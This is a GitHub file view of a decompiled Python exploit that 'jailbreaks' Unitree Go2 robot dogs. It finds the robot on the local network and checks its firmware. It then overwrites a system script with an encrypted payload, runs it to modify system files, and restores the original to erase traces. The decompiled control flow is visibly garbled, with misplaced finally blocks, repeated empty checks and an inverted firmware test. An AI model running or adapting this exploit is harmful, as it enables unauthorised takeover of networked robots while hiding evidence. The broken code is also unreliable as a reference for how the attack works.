-
Notifications
You must be signed in to change notification settings - Fork 89
Expand file tree
/
Copy pathGo2_exploit.py
More file actions
124 lines (118 loc) · 5.87 KB
/
Go2_exploit.py
File metadata and controls
124 lines (118 loc) · 5.87 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
# Decompiled with PyLingual (https://pylingual.io)
# Internal filename: jailbreak.py
# Bytecode version: 3.10.0rc2 (3439)
# Source timestamp: 1970-01-01 00:00:00 UTC (0)
import asyncio
import logging
import sys
import os
import ipaddress
import json
import argparse
from cryptography.fernet import Fernet
from go2_webrtc_driver.webrtc_driver import Go2WebRTCConnection, WebRTCConnectionMethod
from go2_webrtc_driver.msgs.rtc_inner_req import WebRTCDataChannelFileDownloader, WebRTCDataChannelFileUploader
from go2_webrtc_driver.multicast_scanner import discover_ip_sn
from go2_webrtc_driver.constants import RTC_TOPIC
logging.basicConfig(level=logging.FATAL)
def is_valid_ip(ip):
try:
ipaddress.ip_address(ip)
return True
except ValueError:
return False
def load_and_decrypt_file(file_path):
try:
if getattr(sys, 'frozen', False):
base_path = sys._MEIPASS
else: # inserted
base_path = os.path.abspath('.')
file_path = os.path.join(base_path, file_path)
key = 'rq5zgRWyx8iwFZDrAKWBF19g5FvddFLzvYLfqhvQCmo='
cipher_suite = Fernet(key)
with open(file_path, 'rb') as encrypted_file:
encrypted_data = encrypted_file.read()
decrypted_data = cipher_suite.decrypt(encrypted_data)
return decrypted_data.decode('utf-8')
except FileNotFoundError:
print(f'[!] Error: \'{file_path}\' not found.')
return None
except Exception as e:
print(f'[!] Error: {e}')
supported_firmware_version = ['1.0.24', '1.0.25', '1.1.1']
def is_firmware_version_valid(firmware_version):
if firmware_version in supported_firmware_version:
return True
return False
async def main(ip_arg=None):
conn = None
try:
print('\n _ _ _\n | |_| |_ ___ _ _ ___| |__ _____ _____ _ _ ___ ___ __ ___ _ __\n | _| \' \\/ -_) \'_/ _ \\ \'_ \\/ _ \\ V / -_) \'_(_-</ -_)_/ _/ _ \\ \' \\\n \\__|_||_\\___|_| \\___/_.__/\\___/\\_/\\___|_| /__/\\___(_)__\\___/_|_|_|\n \n Join our Discord Channel at https://discord.gg/HjSY9JmBEE\n\n[*] Initiating Jailbreak Process...\n', end='')
print('[*] Looking for Go2 on the local network...')
if ip_arg and is_valid_ip(ip_arg):
ip_address = ip_arg
print(f'[*] Using provided IP address: {ip_address}')
else: # inserted
result = discover_ip_sn()
if not result:
ip_address = input('[*] No devices found on the local network. Please enter the IP address manually: ')
if not is_valid_ip(ip_address):
print(f'{ip_address} is not a valid IP address.')
return
finally: # inserted
if conn:
pass # postinserted
if conn:
pass # postinserted
if conn:
pass # postinserted
if conn:
await conn.disconnect()
else: # inserted
serial_number, ip_address = next(iter(result.items()))
print(f'[*] Device found: {serial_number} with IP {ip_address}')
proceed = input(f'[*] Do you want to proceed with the connection to {ip_address}? (yes/no): ').strip().lower()
if proceed!= 'yes':
print('[*] Connection aborted by the user.')
return
else: # inserted
conn = Go2WebRTCConnection(WebRTCConnectionMethod.LocalSTA, ip=ip_address)
print('[*] Establishing connection to target device...')
await conn.connect()
print('[*] Connection established. Verifying access privileges...')
response = await conn.datachannel.pub_sub.publish_request_new(RTC_TOPIC['BASH_REQ'], {'api_id': 1001, 'parameter': {'script': 'get_whole_packet_version.sh'}})
firmware_version = json.loads(response['data']['data'])['info']
if is_firmware_version_valid(firmware_version):
print(f'[*] Get firmware version from device: {firmware_version}')
print('[*] Firmware version is not supported. Exiting...')
return
uploader = WebRTCDataChannelFileUploader(conn.datachannel, conn.datachannel.pub_sub)
file_name = '/unitree/module/bashrunner/command_execution/test_success.sh'
print('[*] Preparing payload for exploit...')
data = load_and_decrypt_file('injected_script.sh.enc')
byte_data = data.encode('utf-8')
print('[*] Uploading payload...')
await uploader.upload_file(byte_data, file_name)
print('[*] Executing payload...')
response = await conn.datachannel.pub_sub.publish_request_new(RTC_TOPIC['BASH_REQ'], {'api_id': 1001, 'parameter': {'script': 'test_success.sh'}})
if response['data']['header']['status']['code'] == 0:
print('[*] Modifying system files...')
print('[+] Jailbreak completed successfully!')
data = load_and_decrypt_file('original_script.sh.enc')
byte_data = data.encode('utf-8')
print('[*] Cleaning up traces...')
await uploader.upload_file(byte_data, file_name)
print('[+] Cleanup complete.')
print('[*] Exiting jailbreak mode.')
await asyncio.sleep(1)
except ValueError as e:
logging.error(f'An error occurred: {e}')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Unitree Go2 Jailbreak Script (requires firmware > 1.1.1)')
parser.add_argument('--ip', help='IP address of the target device', required=False)
args = parser.parse_args()
try:
asyncio.run(main(ip_arg=args.ip))
except KeyboardInterrupt:
print('\nProgram interrupted by user')
sys.exit(0)